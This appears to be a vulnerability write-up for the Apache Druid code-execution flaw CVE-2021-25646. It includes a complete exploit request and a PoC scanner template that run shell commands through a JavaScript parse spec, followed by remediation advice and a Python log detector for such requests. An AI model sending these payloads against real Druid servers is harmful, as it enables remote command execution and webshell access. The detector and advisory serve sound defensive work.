Apache Druid Code Execution Vulnerability (CVE-2021-25646)



http://localhost:8888/druid/indexer/v1/sampler

Affected function:

Vulnerable request:

POST /druid/indexer/v1/sampler HTTP/1.1
Host: localhost:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}

Druid.yaml

name: poc-yaml-druid-rce-cve-2021-25646-2
level: 3
finger: |
  "apache-druid" in finger.name
rules:
  - method: POST
    headers:
      Content-Type: application/json;charset=UTF-8
    path: /druid/indexer/v1/sampler?for=filter
    body: >
      {
          "type":"index",
          "spec":{
              "ioConfig":{
                  "type":"index",
                  "firehose":{
                      "type":"local",
                      "baseDir":"/etc",
                      "filter":"passwd"
                  }
              },
              "dataSchema":{
                  "dataSource":"test",
                  "parser":{
                      "parseSpec":{
                      "format":"javascript",
                      "timestampSpec":{

                      },
                      "dimensionsSpec":{

                      },
                      "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                      "":{
                          "enabled":"true"
                      }
                      }
                  }
              }
          },
          "samplerConfig":{
              "numRows":10
          }
      }
    expression: |
      response.status == 200 && response.body.bcontains(b"123123")
detail:
  author: ez
  links:
    - https://github.com/vulhub/vulhub/blob/master/apache-druid/CVE-2021-25646/README.zh-cn.md

- https://github.com/vulhub/vulhub/blob/master/apache-druid/CVE-2021-25646/README.zh-cn.md

Vulnerability screenshot: (image not available)

Impact: this vulnerability can lead to obtaining a webshell and to privilege escalation.

Remediation: install the corresponding update.
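
A defensive check built from the request above, added here as an example and not part of the original post or of Druid: it flags logged POST bodies to the sampler endpoint that contain a JavaScript spec or an empty-string key carrying an `enabled` flag. The function names and sample records are constructed for illustration, and matching `"type":"javascript"` as well as `"format":"javascript"` goes beyond the single request shown.

```python
import json
from urllib.parse import urlsplit

SAMPLER_PATH = "/druid/indexer/v1/sampler"  # endpoint from the request above

def _walk(node, path=""):
    """Yield (path, obj) for every JSON object nested anywhere in node."""
    if isinstance(node, dict):
        yield path or "/", node
        for key, value in node.items():
            yield from _walk(value, f"{path}/{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}/{i}")

def inspect_sampler_body(body):
    """Return a list of findings for one request body sent to the sampler."""
    try:
        doc = json.loads(body)
    except (ValueError, RecursionError):
        return ["unparseable-json"]
    findings = []
    for path, obj in _walk(doc):
        # Object that asks Druid to evaluate caller-supplied JavaScript.
        if any(str(obj.get(k, "")).lower() == "javascript" for k in ("format", "type")):
            findings.append(f"javascript-spec at {path}")
        # Empty-string key carrying an "enabled" flag, as in the request above.
        if isinstance(obj.get(""), dict) and "enabled" in obj[""]:
            findings.append(f"empty-key-enabled at {path}")
    return findings

def scan_requests(records):
    """records: iterable of (method, target, body); return [(target, findings)]."""
    hits = ((t, inspect_sampler_body(b)) for m, t, b in records
            if m.upper() == "POST" and urlsplit(t).path.rstrip("/") == SAMPLER_PATH)
    return [(t, f) for t, f in hits if f]

def _body(parse_spec):  # builds the constructed sample bodies below
    return json.dumps({"type": "index", "spec": {"dataSchema": {"parser": {"parseSpec": parse_spec}}}})

SAMPLES = [  # constructed log records, not captured traffic
    ("POST", SAMPLER_PATH, _body({"format": "json"})),
    ("POST", SAMPLER_PATH + "?for=filter",
     _body({"format": "javascript", "function": "<redacted>", "": {"enabled": "true"}})),
    ("GET", "/status", ""),
]

if __name__ == "__main__":
    print(scan_requests(SAMPLES))
```

An `empty-key-enabled` finding deserves the higher priority of the two, since a key with an empty name has no place in a normal ingestion spec.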
